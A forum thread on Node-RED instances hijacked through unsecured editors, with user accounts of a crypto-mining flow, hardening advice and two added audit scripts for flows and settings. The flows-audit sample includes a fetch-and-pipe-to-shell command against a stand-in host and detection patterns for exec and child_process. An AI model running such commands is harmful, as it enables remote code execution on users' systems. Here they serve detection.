Dashboard suddenly asks for password (Hacked Node-RED servers)

Security FAQ updated

Agreed. It's time NR was updated to require UN/PW on first use of the interface rather than asking novice users to jump out of the friendly UI and delve into settings.js via the command line; and the convoluted process of creating a hash that's not really a novice activity - I hope it should be simple to implement and would make all new installations safer out of the box, thus improve reputation despite people not taking enough care over their own IT security... It's great that NR appeals to the tech novice, just a shame it expects a level of technical competence to give it some basic security. At the very least it would be better if the settings.js was editable via the UI in a sensible way.

1 Like

That isn't what I am talking about. If you read my post again you will see I am referring to the system user and pwd, nothing to do with node red.

No, I just closed all ports. NR is not connected to the internet anymore

Yes I know. I was agreeing with your assessment of the improvements to the default Pi OS as installed. I was drawing, albeit clumsily, parallels that if Raspberry can do it, perhaps NR should too; after all, NR is as much targeted at novices as it is at experienced users.

Adding my recent experience to the conversation here. I had nodered running on a Ubuntu VM and noticed it pegged the CPU at 100% usage, which was unusual. A new flow called "spiderpig420" had been added and contained this

I poked around in the github and its primary purpose appears to be crypto mining.

The real head-scratcher for me is how it got in. I don't have any ports opened for nodered through the firewall. There is an nginx reverse proxy that directs to WireGuard for remote access.

I did make the big mistake of not securing nodered after I got done installing it.
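The tampering described in this post (an unexpected tab whose nodes run commands on the host) can be spotted by reading the flows file rather than waiting for the CPU to peg. The script below is an added example, not code from the thread or from the Node-RED project. The flows array is constructed sample data shaped like a Node-RED flows.json export (`tab` entries carry a `label`, ordinary nodes carry `z` pointing at their tab, `exec` nodes carry `command`, `function` nodes carry `func`); only the tab name "spiderpig420" comes from the post, everything else, including the command string, is made up for illustration.

```javascript
// Added example (not from the thread or Node-RED): audit a flows.json array for
// tabs you did not create and for nodes able to run code on the host.

// CONSTRUCTED sample shaped like a flows.json export. Only the tab label
// "spiderpig420" is taken from the post; ids, names and commands are invented.
const SAMPLE_FLOWS = [
  { id: "tab1", type: "tab", label: "Home monitoring" },
  { id: "n1", type: "inject", z: "tab1", name: "every minute", repeat: "60" },
  { id: "n2", type: "mqtt out", z: "tab1", name: "publish temperature" },
  { id: "tab2", type: "tab", label: "spiderpig420" },
  { id: "n3", type: "inject", z: "tab2", name: "", repeat: "30", once: true },
  { id: "n4", type: "exec", z: "tab2", name: "",
    command: "curl -s http://example.invalid/payload.sh | sh", addpay: false },
  { id: "n5", type: "function", z: "tab2", name: "",
    func: "const cp = require('child_process');\ncp.exec('/tmp/.x');\nreturn msg;" },
];

// Core node types that execute a command on the host the runtime is on.
const HOST_EXEC_TYPES = new Set(["exec", "daemon"]);

// Source patterns in a function node that reach for the host or dynamic code.
const SUSPICIOUS_FUNC_PATTERNS = [/child_process/, /\bexec\s*\(/, /\bspawn\s*\(/, /\beval\s*\(/];

// Returns one finding per problem: { nodeId, tab, reason }.
// knownTabs: Set of tab labels the operator actually created.
function auditFlows(flows, knownTabs) {
  const findings = [];
  const tabsById = new Map(
    flows.filter((n) => n.type === "tab").map((t) => [t.id, t.label])
  );

  // 1. Tabs that the operator does not recognise.
  for (const [id, label] of tabsById) {
    if (!knownTabs.has(label)) {
      findings.push({ nodeId: id, tab: label, reason: `unexpected tab "${label}"` });
    }
  }

  // 2. Nodes that can run commands, wherever they sit.
  for (const node of flows) {
    if (node.type === "tab") continue;
    const tab = tabsById.get(node.z) || "(global)";
    if (HOST_EXEC_TYPES.has(node.type)) {
      findings.push({
        nodeId: node.id, tab,
        reason: `${node.type} node runs host command: ${node.command || "(none)"}`,
      });
    }
    if (node.type === "function" &&
        SUSPICIOUS_FUNC_PATTERNS.some((re) => re.test(node.func || ""))) {
      findings.push({
        nodeId: node.id, tab,
        reason: "function node references child_process/exec/spawn/eval",
      });
    }
  }
  return findings;
}

// Stand-alone run over the constructed sample.
for (const f of auditFlows(SAMPLE_FLOWS, new Set(["Home monitoring"]))) {
  console.log(`[${f.tab}] ${f.nodeId}: ${f.reason}`);
}
```

Point this at a copy of the real flows file (`~/.node-red/flows.json` by default) with the set of tab names you created; anything reported under a tab you did not make is a sign the editor was reachable by someone else, and the exec and function findings tell you what that tab was able to do on the Pi.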

I was also caught by the NR password hack - open port and useless UN and PW on the Pi. Of course I first attempted to log on to Node-RED using the presented screen and tried a number of my commonly used names and passwords - could these have been transmitted to the perpetrator - was that the scam?

I don't think so, but to be safe - change them.

The better answer is - don't use common user names and passwords :stuck_out_tongue: (but you already know this)

More importantly, if any of the "common" ones you tried were your primary email - change that immediately and enable 2-factor auth if not already enabled.

Unfortunately, an Internet-facing VM MUST be secured before you let the Internet at it. It just takes a few seconds for bots to come sniffing, and there are plenty of vulnerabilities around that can let people in - though usually it is something very simple.

Also - DO NOT USE COMMON PORTS. If you do want to expose a node-red endpoint to the internet, make sure that it is using a common port such as 443. And of course, if you didn't have TLS (HTTPS) from the outset, you may already have compromised yourself by allowing unencrypted traffic.

Don't expose anything on port 1880 nor SSH on port 22. Use a random high numbered port for SSH and use 443 for TLS protected Node-RED endpoints if it is free, otherwise use 8443 or some other common port.

Reasonable security isn't generally that hard but it does take careful attention to detail. Good or excellent security on the other hand is fiendishly hard to get right and trivially easy to get wrong.

3 Likes
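The checks this reply lists (editor login, TLS, not sitting on 1880, not binding every interface, and auth on the dashboard/HTTP endpoints) can be applied mechanically to a Node-RED settings object. The script below is an added example, not the thread's or Node-RED's own code. It reads the settings keys Node-RED actually uses (`adminAuth`, `https`, `requireHttps`, `uiPort`, `uiHost`, `httpNodeAuth`); the two settings objects are constructed, and the `$2b$08$...` strings are placeholders standing in for real output of `node-red admin hash-pw`, not working hashes. The `https.key`/`https.cert` values are likewise placeholders for PEM file contents.

```javascript
// Added example (not from the thread or Node-RED): audit a settings.js-style
// object for the gaps this thread keeps running into.

// Shape of a bcrypt hash as Node-RED stores it ($2a$/$2b$/$2y$ + cost + salt).
const BCRYPT_RE = /^\$2[aby]\$\d\d\$/;

// CONSTRUCTED: a settings file left as installed, then only the port changed.
const WEAK_SETTINGS = { uiPort: 1880 };

// CONSTRUCTED: the same file after following the securing-node-red guide.
// Hash strings are PLACEHOLDERS, not real `node-red admin hash-pw` output.
const HARDENED_SETTINGS = {
  uiPort: 8443,
  uiHost: "127.0.0.1",               // reach it through a VPN or reverse proxy only
  adminAuth: {
    type: "credentials",
    users: [{ username: "ops", password: "$2b$08$PLACEHOLDER_bcrypt_hash_here", permissions: "*" }],
  },
  https: { key: "PLACEHOLDER_PEM_KEY", cert: "PLACEHOLDER_PEM_CERT" },
  requireHttps: true,                // redirect plain HTTP instead of serving it
  httpNodeAuth: { user: "dash", pass: "$2b$08$PLACEHOLDER_bcrypt_hash_here" },
};

// Returns an array of human-readable findings; empty means nothing flagged.
function auditSettings(s) {
  const findings = [];

  if (!s.adminAuth) {
    findings.push("adminAuth missing: anyone who reaches the port can open the editor and deploy flows");
  } else {
    for (const u of s.adminAuth.users || []) {
      if (!BCRYPT_RE.test(u.password || "")) {
        findings.push(`adminAuth user "${u.username}": password is not a bcrypt hash; generate one with node-red admin hash-pw`);
      }
    }
  }

  if (!s.https) {
    findings.push("https not configured: editor credentials and flows travel in clear text");
  } else if (s.requireHttps !== true) {
    findings.push("requireHttps not set: plain HTTP is still accepted alongside TLS");
  }

  if ((s.uiPort ?? 1880) === 1880) {
    findings.push("uiPort is the default 1880, the first port scanners try for Node-RED");
  }

  if (!s.uiHost || s.uiHost === "0.0.0.0" || s.uiHost === "::") {
    findings.push("uiHost binds every interface; bind 127.0.0.1 and reach it over a VPN (e.g. WireGuard) or a reverse proxy");
  }

  if (!s.httpNodeAuth) {
    findings.push("httpNodeAuth missing: dashboard and HTTP In endpoints are open to anyone");
  }

  return findings;
}

// Stand-alone run over both constructed objects.
for (const [name, s] of [["weak", WEAK_SETTINGS], ["hardened", HARDENED_SETTINGS]]) {
  const found = auditSettings(s);
  console.log(`${name}: ${found.length} finding(s)`);
  for (const f of found) console.log("  - " + f);
}
```

To run it against a real install, `require()` the actual `settings.js` (it exports a plain object) and pass that object to `auditSettings`. The bcrypt check only confirms the password field has the shape Node-RED expects; it says nothing about password strength, and a plaintext value there will never authenticate because Node-RED compares it as a hash.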

You are absolutely correct. While this was not too bad to recover from, it serves as a good reminder to stay on top of the basics. Could have been much worse.

2 Likes

I believe I too have been compromised. I noticed a day or two ago that some of my Node Red Dashboards and HTML webpages were not updating properly. I am working remotely (1500 miles) from the location of my RPis.

I signed into my home PC via TeamViewer and then signed into each of my RPis via SSH and rebooted them. I then was presented with the pop-ups asking for UID and PWD for each of the Node-Red and Dashboard webpages, both locally (via TeamViewer) and remotely over the internet. Although I had not used UID/PWD credentials for this type of access previously, I tried my RPi's UID and PWD (pi and non-standard pwd) before suspecting something was wrong.

I then SSH'd into one of my RPis locally (via TeamViewer) and looked at the Node Red settings.js file. It contained the credentials section with 'admin', xxxx. I looked on the internet and found this post.

I use non-standard ports for remote access and I use a non-standard pi password, but since I have likely been hacked, is there anything I can do to restore my RPis before I get home (a month from now), or am I best to just shut them down, remotely, altogether?

They facilitate my home monitoring and control my home lights, so would really like to get back to 'normal' somehow until I get home and can make things more secure.

Sorry to hear about your situation.

Do you know the most likely point of entry that allowed someone into the system? If so, are you able to plug those holes? If you cannot determine the point of failure and/or are unable to resolve it first, then I would stop there and shut the whole thing down.

I have shut Node Red down on each of the Pi's for now while I investigate further.
I don't know the point of entry; the open ports were in the 8000 range.

Did you have a password protecting the editor / admin API?

Just the pi user pwd.
Thanks for your help.
(off to bed; PDT here)

I am far (far, far, far) from an expert on this, but I would make sure to go through this

https://nodered.org/docs/user-guide/runtime/securing-node-red

Also consider using something like PiVPN to give yourself a better path in.

It appears that the bot is searching not only the standard port but others too. Were you using 8880 by any chance?
I am afraid all you can do is erase the SD cards and restore from your backup and put it down to experience.

The attack seems to have got into your Pi via the Node-red editor. Your pi username and password were probably never used.

However, Node-red was just the point of entry. We have seen that the attack downloads and executes a binary file. We have no idea what else that might have done, but it's not unreasonable to imagine that it would have tried to identify and attack other devices on your network.

We know about the attack this time because it set the Node-red admin user name and password.
But we can't be sure this was the first time the attacker has been in your network.

As @dceejay says above: "at this point I would assume other parts of your machine have been compromised - and that it would be unsafe to continue to use it without completely wiping the SD card and starting again."

I hope the developers are thinking of ways to keep users with Node-red on small computers from using it unsafely in future.

EXACTLY. I am hardly a novice user and have had my NR instance exposed to the internet for probably five years now. Like others here, I have been similarly hacked this past weekend (Oct. 15). Even with big warnings, etc., I had done nothing due to the complexities and gobbledygook-sounding stuff required to set up security. My SD card has been removed and a new image started that for now is not internet exposed. Maybe some long, cold, snowy day in the winter…

I think the application should not have public access. A lot of applications are not safe per se, and that is why you DO NOT put anything on the internet directly. The exception is if you know what you're doing, but then again you wouldn't put it on the internet :slight_smile: